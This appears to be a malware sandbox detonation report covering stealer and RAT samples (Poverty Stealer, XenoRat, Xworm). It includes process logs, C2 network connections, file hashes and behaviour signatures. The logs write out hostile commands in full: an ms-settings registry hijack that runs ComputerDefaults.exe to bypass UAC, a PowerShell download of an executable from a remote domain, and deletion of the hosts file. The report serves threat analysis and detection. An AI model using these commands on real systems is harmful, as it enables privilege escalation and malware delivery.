/c del /f C:\Users\Admin\AppData\Local\Temp\8172.vbs
C:\Windows\system32\cmd.exe
/c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
C:\Windows\system32\cmd.exe
/c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
C:\Windows\system32\cmd.exe
/c reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\6359.vbs" /f & reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\6359.vbs" /f
C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f
C:\Windows\system32\cmd.exe
/c start /B ComputerDefaults.exe
C:\Windows\system32\ComputerDefaults.exe
ComputerDefaults.exe
C:\Windows\system32\cmd.exe
/c del /f C:\Users\Admin\AppData\Local\Temp\6359.vbs
C:\Windows\system32\cmd.exe
/c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
C:\Windows\system32\cmd.exe
/c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
C:\Windows\system32\cmd.exe
/c reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\9892.vbs" /f & reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\9892.vbs" /f
C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f
C:\Windows\system32\cmd.exe
/c start /B ComputerDefaults.exe
C:\Windows\system32\ComputerDefaults.exe
ComputerDefaults.exe
C:\Windows\system32\cmd.exe
/c del /f C:\Users\Admin\AppData\Local\Temp\9892.vbs
C:\Windows\system32\cmd.exe
/c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
C:\Users\Admin\AppData\Local\Temp\a\filer.exe
"C:\Users\Admin\AppData\Local\Temp\a\filer.exe"
C:\Users\Admin\AppData\Local\Temp\a\AmLzNi.exe
"C:\Users\Admin\AppData\Local\Temp\a\AmLzNi.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Invoke-WebRequest -Uri "https://ratsinthehole.com/vvvv/yVdlbFlx" -OutFile "C:\Users\Public\Guard.exe""
C:\Windows\System32\ie4uinit.exe
"C:\Windows\System32\ie4uinit.exe" -reinstall
C:\Windows\system32\unregmp2.exe
C:\Windows\system32\unregmp2.exe /SetWMPAsDefault
C:\Windows\System32\ie4uinit.exe
"C:\Windows\System32\ie4uinit.exe" -reinstall
C:\Windows\system32\unregmp2.exe
C:\Windows\system32\unregmp2.exe /SetWMPAsDefault
C:\Windows\System32\ie4uinit.exe
"C:\Windows\System32\ie4uinit.exe" -reinstall
C:\Windows\system32\unregmp2.exe
C:\Windows\system32\unregmp2.exe /SetWMPAsDefault
C:\Users\Admin\AppData\Local\Temp\a\Xworm%20V5.6.exe
"C:\Users\Admin\AppData\Local\Temp\a\Xworm%20V5.6.exe"
C:\Users\Admin\AppData\Local\Temp\a\XClient.exe
"C:\Users\Admin\AppData\Local\Temp\a\XClient.exe"
C:\Users\Admin\AppData\Local\Temp\a\333.exe
"C:\Users\Admin\AppData\Local\Temp\a\333.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | urlhaus.abuse.ch | udp |
| US | 151.101.194.49:443 | urlhaus.abuse.ch | tcp |
| RU | 31.41.244.11:80 | 31.41.244.11 | tcp |
| AT | 185.244.212.106:2227 | tcp | |
| US | 8.8.8.8:53 | beastsband.com | udp |
| US | 85.209.133.150:4444 | beastsband.com | tcp |
| US | 85.209.133.150:4444 | beastsband.com | tcp |
| US | 85.209.133.150:4444 | beastsband.com | tcp |
| US | 85.209.133.150:4444 | beastsband.com | tcp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| US | 85.209.133.150:4444 | beastsband.com | tcp |
| US | 68.178.207.33:8000 | 68.178.207.33 | tcp |
| US | 68.178.207.33:8000 | 68.178.207.33 | tcp |
| US | 68.178.207.33:8000 | 68.178.207.33 | tcp |
Files
memory/2280-0-0x000007FEF5EE3000-0x000007FEF5EE4000-memory.dmp
memory/2280-1-0x00000000009B0000-0x00000000009B8000-memory.dmp
memory/2280-2-0x000007FEF5EE0000-0x000007FEF68CC000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\CabEF60.tmp
| MD5 | 49aebf8cbd62d92ac215b2923fb1b9f5 |
| SHA1 | 1723be06719828dda65ad804298d0431f6aff976 |
| SHA256 | b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f |
| SHA512 | bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b |
C:\Users\Admin\AppData\Local\Temp\TarEF73.tmp
| MD5 | 4ea6026cf93ec6338144661bf1202cd1 |
| SHA1 | a1dec9044f750ad887935a01430bf49322fbdcb7 |
| SHA256 | 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8 |
| SHA512 | 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b |
C:\Users\Admin\AppData\Local\Temp\a\UqhRb9F.exe
| MD5 | cfbd38c30f1100b5213c9dd008b6e883 |
| SHA1 | 03da6d72c9d92bea2b2e5c4a8538f0a3628fbe73 |
| SHA256 | 25350f356b356c9ab48ebfcca67cad970d1a213f8716a1d006d339a38f0f7cc5 |
| SHA512 | a7d3bce28d0443dbe671394bd6c720f0fba28cf18ee0a5c3bfe547c3ffaebb9431ebe40749de1eb460b03696a401c167d76de99e9769e33ca62a3bf8302a5b04 |
memory/3060-64-0x0000000000030000-0x0000000000490000-memory.dmp
memory/3060-65-0x0000000000030000-0x0000000000490000-memory.dmp
memory/3060-66-0x0000000000030000-0x0000000000490000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\a\Tq4a1Bz.exe
| MD5 | 9c433a245d7737ca7fa17490e460f14e |
| SHA1 | 31e6388f4e45a97a97ac0f34c26a9858ef8dcdb9 |
| SHA256 | 0b6604d2e6086f7322c634ab925bdc381fe720a2a12f254e5b63b42f89b680f7 |
| SHA512 | edaf8ff778db40dfcacd7c8cb5cef598dc7c13ebfb6b4f8e828c0697b24115f637ac510c945d31b1c4873d39fca7d8be7b03ba6dc64e665def6bf2d058a00c95 |
memory/1956-92-0x0000000000400000-0x000000000040A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\a\wKQeiIr.exe
| MD5 | b73ecb016b35d5b7acb91125924525e5 |
| SHA1 | 37fe45c0a85900d869a41f996dd19949f78c4ec4 |
| SHA256 | b3982e67820abc7b41818a7236232ce6de92689b76b6f152fab9ef302528566d |
| SHA512 | 0bea9890dbcd3afd2889d0e7c0f2746995169e7b424f58d4998c50bc49d2b37d30f5bd1845d3079b25f9963af2b71f136719cbd9fda37f7b85874992096b3e1d |
memory/1956-90-0x0000000000400000-0x000000000040A000-memory.dmp
memory/1956-89-0x0000000000400000-0x000000000040A000-memory.dmp
memory/1956-87-0x0000000000400000-0x000000000040A000-memory.dmp
memory/1956-86-0x000000007EFDE000-0x000000007EFDF000-memory.dmp
memory/1956-84-0x0000000000400000-0x000000000040A000-memory.dmp
memory/1956-82-0x0000000000400000-0x000000000040A000-memory.dmp
memory/1956-80-0x0000000000400000-0x000000000040A000-memory.dmp
memory/1956-78-0x0000000000400000-0x000000000040A000-memory.dmp
memory/1956-76-0x0000000000400000-0x000000000040A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\a\fHR9z2C.exe
| MD5 | 892d97db961fa0d6481aa27c21e86a69 |
| SHA1 | 1f5b0f6c77f5f7815421444acf2bdd456da67403 |
| SHA256 | c4b11faff0239bc2d192ff6e90adec2684124336e37c617c4118e7e3bc338719 |
| SHA512 | 7fe31101f027f2352dea44b3ba4280e75a4359b6a822d813f9c50c0d6ef319b7c345280786c1bc794b45fbd4fa87939a79cc15b82fc7959ccce1b732f33ba241 |
memory/2280-103-0x000007FEF5EE3000-0x000007FEF5EE4000-memory.dmp
memory/1956-104-0x0000000000400000-0x000000000040A000-memory.dmp
memory/2280-105-0x000007FEF5EE0000-0x000007FEF68CC000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\8172.vbs
| MD5 | 8b4ed5c47fdddbeba260ef11cfca88c6 |
| SHA1 | 868f11f8ed78ebe871f9da182d053f349834b017 |
| SHA256 | 170226b93ac03ac3178c0429577626add00665e1d71be650a4c46674f6e262a5 |
| SHA512 | 87e5bcaa143e616c365557f5af73e131a10eb380016633b8c7e38c83b0a216a8f6768cfa0166fad208d47830808444517e57d07d850ff2bd575ca67bad9eabdf |
memory/3060-109-0x0000000000030000-0x0000000000490000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\6359.vbs
| MD5 | 34b33b5a437e20d03d79b62a797dfe99 |
| SHA1 | 9b57b598a7e9d66157a05a44bc7c097bf5486e6c |
| SHA256 | f920f526773c0565072fcfd250319c9dd53b9197d448b9d29307598e0fa004e1 |
| SHA512 | 757be8161af2eb4af36772e2e0d912e0967540cb42ef6ef8cd85f28edb478756c99d9e7a6fef04b16e6bf63a3dc9ddb9c2adf490e8d9ae2ca0e3e9b76ef6fa6c |
C:\Users\Admin\AppData\Local\Temp\9892.vbs
| MD5 | bb8cfb89bce8af7384447115a115fb23 |
| SHA1 | 6a0e728f4953128db9db52474ae5608ecee9c9c3 |
| SHA256 | d812291a41eddd5eac04972e66feffc44c1ee2c249d708bb282144823a6e8485 |
| SHA512 | d69901ba3cebd1fe8ed8e3d613e16a6cfbead827a9493a7edd8c62fb2915a550450ff4f47f00a8c66880ea10cd4029bceac4518d1951c19fb7ad9d7505007553 |
memory/3060-115-0x0000000008A80000-0x0000000008B7A000-memory.dmp
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 711af76ea08b7f6783442f5d9c7eade4 |
| SHA1 | 0a88410afe8c86a5f23473d27314a3dcc879437b |
| SHA256 | dba9065d0698a6fd7891c95284bddf603dd8cc590528761bb835bb489827c3df |
| SHA512 | b82ff09e6e68ca7fdb6ffd947639b01a5f0c4e5167473f5f188284cbd9309688e3e00b61ccdb899efd8f5c7e352308335baef58062dad8521acc8a5ea6cd195b |
memory/3060-184-0x00000000027A0000-0x00000000027AC000-memory.dmp
\Users\Admin\AppData\Local\Temp\a\filer.exe
| MD5 | 9096f57fa44b8f20eebf2008a9598eec |
| SHA1 | 42128a72a214368618f5693df45b901232f80496 |
| SHA256 | f4e2eeea7e5db511bfca33ffd1e26bce5d72e2a381e84bf3700938eb404f7934 |
| SHA512 | ad29f94040532ab78679ec9e50d58d8ccef3f99d5ab53ef7c654527b9b2634da4c44375b2ca2d54a83d1dd1e0fa9b1d1a13241ffe0328bea07740166927521b2 |
memory/1436-196-0x000000013F1C0000-0x0000000140BE1000-memory.dmp
\Users\Admin\AppData\Local\Temp\a\AmLzNi.exe
| MD5 | 73507ed37d9fa2b2468f2a7077d6c682 |
| SHA1 | f4704970cedac462951aaf7cd11060885764fe21 |
| SHA256 | c33e3295dcb32888d000a2998628e82fd5b6d5ee3d7205ea246ac6357aa2bea6 |
| SHA512 | 3a1031ce2daf62a054f41d226e9c9a0144ce746130db68737aaaa7930b148cbfbb99476c05504d6ebd4911f4e567ec1399005be7e64583caa636d7d94f5cd369 |
memory/904-208-0x000000001B600000-0x000000001B8E2000-memory.dmp
memory/904-209-0x0000000000460000-0x0000000000468000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Internet Explorer (No Add-ons).lnk
| MD5 | 64fc02d8f9104b83fee148f0df56f3cd |
| SHA1 | 106dc0efa5fc99f4fea735251c6f60bb3b3da28b |
| SHA256 | bde6128d9e4a2d985fe6533d8043c6cba2b8af32b68022aab902763a2387920d |
| SHA512 | 7d91b1f3453d535b7ba5284f266c590a191481e4d8ddf9c2914c5ba7c7b0da02962e5a4662a8991ef158849c62e87d6fb992dc38c23541096b0bb319a9665411 |
C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Internet Explorer.lnk
| MD5 | cb962c9b656383db8fa5ded4d1a1c113 |
| SHA1 | 0edda8ee31e3c35dff7e301e97ad37c7f5be6791 |
| SHA256 | 8239ff69d45342868c5a6e110561b2e636fac947976905a014cd28268f31a98e |
| SHA512 | 51af57f8895f95d3fdfa41845eb618161a5c67f58edcbcfd02141ba84b36a121e4254a3891484bd8e016fe83b09956c70bd1f9c640c5612141659e80232aac05 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
| MD5 | 63423869f9fe7836d7b9d15984eec649 |
| SHA1 | d5d45be78bcaa0a3c7ce62010f897ef0dd21fbae |
| SHA256 | c19d97ab9d35dca3416bbc7ab0916e8b9b7aa18ac3dbcf0696ee355165c27938 |
| SHA512 | bae376e1a0435692fa045d319e8313bf39c66348311fb38f2800da53e654f99635f449fc0bd00a3453a5219653ac87e11dfdda7f74fad25050f1c50b4e3dd62a |
C:\Users\Admin\AppData\Local\Temp\a\Xworm%20V5.6.exe
| MD5 | 88cc64bfe8957b2cf8dd7b53b22ed9fe |
| SHA1 | 1d2ad3864b06b2231679b4c133d2a1fa1c5a0a8c |
| SHA256 | a2d25c62173a0c08e68297f9ef867ce1fd129f97ef5c2d57d2884828e9934edd |
| SHA512 | 41eec5878e40aaea890aa63e646ec0b9d78aa38ccf0b50d058f1fd6aa83832e0e584c095766ac7000ba08df34fe6535c6100dd2d2e5a5b0682125d259070e54a |
C:\Users\Admin\AppData\Local\Temp\a\Xworm%20V5.6.exe
| MD5 | c8d11f350133ea7691328c00891ab4c2 |
| SHA1 | 4b22eb4bc156b466378013bee8bc4ea81cf9ce72 |
| SHA256 | 41ccde6889dc9d53236e257d4e187a633129dfb112031901c03e5c69c5eb1656 |
| SHA512 | ff92786d302b911f9b6280d40288432ee08099097790624b83f71588734f5cb329715a8e6d4973b892a15021ce0c5aa4deba88cd3dfa518a83db281ebd3f6f9f |
memory/272-234-0x0000000001320000-0x0000000002208000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\a\XClient.exe
| MD5 | ce69d13cb31832ebad71933900d35458 |
| SHA1 | e9cadfcd08d79a2624d4a5320187ae84cf6a0148 |
| SHA256 | 9effe406fd302590314a9211fda92126ea6a7721d294c93fdf755b4cdfbd0bcf |
| SHA512 | 7993e79a9aeee679c9342d36fcb7624f1e7616db59eff10ff50d00e84bbbc5d9d7c154601f8a94bed7f25888f43f6f1922b87af31a582221e9022e6a8c3b1409 |
memory/964-244-0x0000000000190000-0x000000000019E000-memory.dmp
Analysis: behavioral6
Detonation Overview
Submitted
2024-11-26 22:53
Reported
2024-11-26 22:54
Platform
win10v2004-20241007-en
Max time kernel
67s
Max time network
68s
Command Line
Signatures
Detect Poverty Stealer Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detect XenoRat Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Poverty Stealer
Povertystealer family
XenorRat
Xenorat family
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\a\UqhRb9F.exe | N/A |
Downloads MZ/PE file
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\a\UqhRb9F.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\a\UqhRb9F.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\wscript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\wscript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\wscript.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\UqhRb9F.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\Tq4a1Bz.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\Tq4a1Bz.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\wKQeiIr.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\fHR9z2C.exe | N/A |
Identifies Wine through registry keys
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\a\UqhRb9F.exe | N/A |
Reads user/profile data of web browsers
Indicator Removal: File Deletion
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\UqhRb9F.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 5112 set thread context of 1316 | N/A | C:\Users\Admin\AppData\Local\Temp\a\Tq4a1Bz.exe | C:\Users\Admin\AppData\Local\Temp\a\Tq4a1Bz.exe |
Browser Information Discovery
Enumerates physical storage devices
Event Triggered Execution: Netsh Helper DLL
| Description | Indicator | Process | Target |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\System32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\System32\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\System32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\System32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\System32\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\System32\netsh.exe | N/A |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\UqhRb9F.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\Tq4a1Bz.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\Tq4a1Bz.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\wKQeiIr.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\ms-settings | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\ms-settings\Shell | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\ms-settings\Shell\Open\command\ = "wscript.exe C:\\Users\\Admin\\AppData\\Local\\Temp\\8540.vbs" | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\ms-settings\Shell\Open | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\ms-settings | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\ms-settings\Shell\Open\command | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\ms-settings | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\ms-settings\Shell\Open\command | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\ms-settings\Shell | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\ms-settings | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\ms-settings\Shell\Open\command\DelegateExecute | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\ms-settings\Shell\Open | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\ms-settings\Shell | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\ms-settings\Shell\Open | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\ms-settings\Shell | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\ms-settings\Shell\Open\command | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\ms-settings\Shell\Open | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\ms-settings\Shell\Open | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\ms-settings | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\ms-settings\Shell\Open\command | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\ms-settings\Shell\Open\command\DelegateExecute | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\ms-settings\Shell\Open\command\DelegateExecute | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\ms-settings\Shell\Open\command | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\ms-settings\Shell\Open\command | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\ms-settings\Shell | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\ms-settings\Shell\Open | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\ms-settings\Shell\Open\command\ = "wscript.exe C:\\Users\\Admin\\AppData\\Local\\Temp\\4982.vbs" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\ms-settings\Shell\Open\command | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\ms-settings\Shell\Open\command\ = "wscript.exe C:\\Users\\Admin\\AppData\\Local\\Temp\\6074.vbs" | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\ms-settings\Shell\Open\command | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\ms-settings\Shell\Open\command | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\ms-settings | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\ms-settings\Shell | C:\Windows\system32\reg.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\a\UqhRb9F.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\UqhRb9F.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe
"C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe"
C:\Users\Admin\AppData\Local\Temp\a\UqhRb9F.exe
"C:\Users\Admin\AppData\Local\Temp\a\UqhRb9F.exe"
C:\Users\Admin\AppData\Local\Temp\a\Tq4a1Bz.exe
"C:\Users\Admin\AppData\Local\Temp\a\Tq4a1Bz.exe"
C:\Users\Admin\AppData\Local\Temp\a\Tq4a1Bz.exe
"C:\Users\Admin\AppData\Local\Temp\a\Tq4a1Bz.exe"
C:\Users\Admin\AppData\Local\Temp\a\wKQeiIr.exe
"C:\Users\Admin\AppData\Local\Temp\a\wKQeiIr.exe"
C:\Users\Admin\AppData\Local\Temp\a\fHR9z2C.exe
"C:\Users\Admin\AppData\Local\Temp\a\fHR9z2C.exe"
C:\Windows\system32\cmd.exe
/c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
C:\Windows\system32\cmd.exe
/c reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\8540.vbs" /f & reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\8540.vbs" /f
C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f
C:\Windows\system32\cmd.exe
/c start /B ComputerDefaults.exe
C:\Windows\system32\ComputerDefaults.exe
ComputerDefaults.exe
C:\Windows\system32\wscript.exe
"wscript.exe" C:\Users\Admin\AppData\Local\Temp\8540.vbs
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C del C:\Windows\System32\drivers\etc\hosts
C:\Windows\system32\cmd.exe
/c del /f C:\Users\Admin\AppData\Local\Temp\8540.vbs
C:\Windows\system32\cmd.exe
/c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
C:\Windows\system32\cmd.exe
/c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
C:\Windows\system32\cmd.exe
